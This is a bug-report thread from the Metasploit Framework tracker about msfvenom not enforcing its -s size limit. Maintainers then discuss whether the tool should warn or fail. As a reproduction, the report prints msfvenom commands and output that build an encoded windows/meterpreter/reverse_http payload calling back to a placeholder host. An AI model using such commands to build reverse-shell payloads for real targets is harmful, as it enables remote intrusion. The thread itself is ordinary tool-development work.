### ISSUE TITLE
msfvenom -s option doesn't work

### ISSUE THREAD

**Issue by savetree** [rapid7/metasploit-framework#6558]
Hi, it looks like msfvenom is ignoring -s option if no encoder is specified:

```
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_http LHOST=IP LPORT=80 -s 800 -e x86/alpha_mixed -i 3 -f raw -o rev_http_IP_80
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 705 (iteration=0)
x86/alpha_mixed succeeded with size 1472 (iteration=1)
x86/alpha_mixed failed with encoder has made a buffer that is too big
Error: An encoding exception occurred.

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_http LHOST=IP LPORT=80 -s 100 -f raw -o rev_http_IP_80
No encoder or badchars specified, outputting raw payload
Payload size: 322 bytes
Saved as: rev_http_IP_80

**Comment by jlee-r7** [comment]
I'm not sure what the expected outcome should be here. Payloads are the size they are, for the most part, and if that's bigger than the given size, we can't really do anything about it. Should `msfvenom` issue a warning?

**Comment by bcook-r7** [comment]
Sometimes payloads can disable some features, like UUID tracking, if they need to be smaller. But that's per-payload and is somewhat coarse. It's not a general msfvenom guaranteed that it can shrink a payload for a particular size constraint.

**Comment by savetree** [comment]
You are both right, but I think that msfvenom should fail if it can not create payload user needs.

**Comment by bcook-r7** [comment]
We should probably fix that to avoid the principal of most surprise!
